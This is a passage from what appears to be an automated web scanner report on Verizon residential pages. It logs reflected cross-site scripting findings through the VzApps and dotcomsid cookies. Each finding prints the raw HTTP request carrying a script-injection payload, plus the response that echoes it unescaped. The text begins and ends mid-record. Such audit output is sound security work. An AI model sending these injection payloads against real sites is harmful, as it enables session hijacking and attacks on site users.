oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109086
Expires: Sat, 20 Nov 2010 02:55:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX86006<script>alert(1)</script>84bd500f181; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86006<SCRIPT>ALERT(1)</SCRIPT>84BD500F181 </DIV>
...[SNIP]...

1.173. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f06b1'><script>alert(1)</script>fc2813f1a29 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf06b1'><script>alert(1)</script>fc2813f1a29; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110632
Expires: Sat, 20 Nov 2010 02:55:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=TXf06b1'><script>alert(1)</script>fc2813f1a29; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF06B1'><SCRIPT>ALERT(1)</SCRIPT>FC2813F1A29 ' />
...[SNIP]...

1.174. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10ba"-alert(1)-"93515101fac was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=b10ba"-alert(1)-"93515101fac; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115390
Expires: Sat, 20 Nov 2010 02:55:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "b10ba"-alert(1)-"93515101fac"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.175. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcef1'><script>alert(1)</script>614ae10fb65 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdcef1'><script>alert(1)</script>614ae10fb65; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 02:56:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=TXdcef1'><script>alert(1)</script>614ae10fb65; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDCEF1'><SCRIPT>ALERT(1)</SCRIPT>614AE10FB65 ' />
...[SNIP]...

1.176. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload c9efe<script>alert(1)</script>6775dca418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXc9efe<script>alert(1)</script>6775dca418; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; 